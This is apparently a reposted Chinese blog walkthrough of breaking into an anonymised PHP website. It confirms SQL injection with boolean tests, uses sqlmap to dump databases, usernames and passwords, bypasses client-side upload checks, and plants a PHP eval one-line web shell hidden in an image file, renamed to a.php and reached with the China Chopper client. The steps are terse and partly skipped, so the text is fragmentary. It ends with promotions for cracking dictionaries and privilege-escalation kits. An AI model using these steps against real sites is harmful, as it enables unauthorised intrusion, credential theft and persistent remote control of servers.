声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
文章来源:CSDN博客(Randmancy)
原文地址:
https://blog.csdn.net/qq_34341458/article/details/113845203
正文
1.找注入点
http://xxxxxx/xxxx.php?id=6’ ,没有回显
输入:http://xxxxxx/xxxx.php?id=6 and 1=1 有回显,and 1 = 2没有回显,说明存在注入。sqlmap.py -u “http://xxxxx/xxxx.php?id=6”
发现有注入,然后使用–dbs,–tables,–columns,–dump找出用户名和密码。发现有黑名单。先看下是否是本地js校验。右键审查元素,发现是本地js校验。6.将图片使用C32Asm打开,在最后面添加一句话:<?php @ eval ( $_POST [ 'pw' ]); ?>保存,命名为a.php。然后上传,发现上传成功,使用菜刀连接,密码pw。
关注公众号回复“9527”可以领取一套HTB靶场文档和视频,“1208”个人常用高效爆破字典,“0221”2020年酒仙桥文章打包,“2191”潇湘信安文章打包,“1212”杀软对比源码+数据源,“0421”Windows提权工具包。 还在等什么?赶紧点击下方名片关注学习吧!
文章来源: http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247497182&idx=1&sn=88330a1ca0f21e36368ed34ab2b836bb&chksm=cfa551cdf8d2d8db61357b8eafefb2219d7d3273bdf0cda4c2b33675c2be8208d28a594b6e20#rd
如有侵权请联系:admin#unsafe.sh